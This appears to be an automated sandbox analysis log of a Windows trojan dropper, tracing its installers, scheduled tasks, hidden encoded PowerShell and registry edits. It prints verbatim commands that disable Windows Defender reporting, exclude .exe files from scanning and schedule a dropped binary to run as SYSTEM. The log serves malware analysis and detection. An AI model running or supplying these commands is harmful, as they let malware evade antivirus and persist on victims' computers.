Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gbyyEslRl" /SC once /ST 15:13:59 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gbyyEslRl"
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Windows\System32\gpupdate.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\gpscript.exe gpscript.exe /RefreshSystemParam
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gbyyEslRl"
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:16:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe\" DC /site_id 525403 /S" /V1 /F
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown, Process created: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe DC /site_id 525403 /S
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\reg.exe, Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe, Process created: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe .\Install.exe
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe, Process created: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe .\Install.exe /S /site_id "525403"
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe, Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe, Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe, Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gbyyEslRl" /SC once /ST 15:13:59 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe, Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gbyyEslRl"
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe, Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gbyyEslRl"
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe, Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bbsSMGQQDZvgelOgpL" /SC once /ST 19:16:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe\" DC /site_id 525403 /S" /V1 /F
Source: C:\Windows\SysWOW64\forfiles.exe, Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
Source: C:\Windows\SysWOW64\forfiles.exe, Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\gpupdate.exe "C:\Windows\system32\gpupdate.exe" /force
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe, Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe, Process created: C:\Windows\SysWOW64\reg.exe "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Users\user\Desktop\file.exe, File created: C:\Users\user\AppData\Local\Temp\7zS2607.tmp
Source: classification engine, Classification label: mal100.troj.evad.winEXE@89/15@2/0
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe, File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5648:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe, Mutant created: \BaseNamedObjects\Global\1_H69925949
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2072:120:WilError_01
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2356:120:WilError_01
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5804:120:WilError_01
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_01
Source: C:\Windows\System32\conhost.exe, Mutant created: \BaseNamedObjects\Local\SM0:2080:120:WilError_01
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_01
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:408:120:WilError_01
Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4092:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe, File written: C:\Windows\System32\GroupPolicy\gpt.ini
Source: Window Recorder, Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: file.exe, Static file information: File size 7604002 > 1048576

Data Obfuscation

Source: unknown, Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_00411360 push ecx; mov dword ptr [esp], ecx 0_2_00411361
Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_00413954 push eax; ret 0_2_00413972
Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_00413CC0 push eax; ret 0_2_00413CEE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 38_2_02E4EB56 push es; iretd 38_2_02E4EB57
Source: file.exe, Static PE information: section name: .sxdata
Source: Install.exe.0.dr, Static PE information: section name: .sxdata
Source: C:\Users\user\Desktop\file.exe, Code function: 0_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00418320

Persistence and Installation Behavior

Source: C:\Windows\SysWOW64\cmd.exe, Process created: reg.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe, Process created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe, File created: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe
Source: C:\Users\user\Desktop\file.exe, File created: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe, File created: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe
Source: C:\Users\user\AppData\Local\Temp\VXAfcxyYiTQKMOERw\efplSHrLkKviaSK\pdyDoIJ.exe, File created: C:\Windows\Temp\aoRCsjFoxFbwPJxK\MeXzroudxpEgwUW\RFYnzaH.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe, Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gbyyEslRl" /SC once /ST 15:13:59 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
Source: C:\Windows\SysWOW64\schtasks.exe, File created: C:\Windows\Tasks\bbsSMGQQDZvgelOgpL.job
Source: C:\Users\user\Desktop\file.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\Install.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3160 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6044 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3680 Thread sleep count: 2307 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3272 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6140
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2307
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040553A FindFirstFileA,0_2_0040553A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA,0_2_004055DE
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Temp\7zS2607.tmp\__data__\
Source: file.exe Binary or memory string: V{TvMci:
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418320 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00418320
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041584A SetUnhandledExceptionFilter,0_2_0041584A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041585C SetUnhandledExceptionFilter,0_2_0041585C

HIPS / PFW / Operating System Protection Evasion

Source: unknown Process created: Base64 decoded start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\exclusions\extensions\" /f /v \"exe\" /t reg_sz /d 0 /reg:64&
Source: C:\Users\user\AppData\Local\Temp\7zS2D0C.tmp\Install.exe Process created: C:\Windows\SysWOW64\forfiles.exe c:\windows\system32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /c reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:32&reg add \"hklm\software\policies\microsoft\windows defender\spynet\" /f /v \"spynetreporting\" /t reg_dword /d 0 /reg:64&
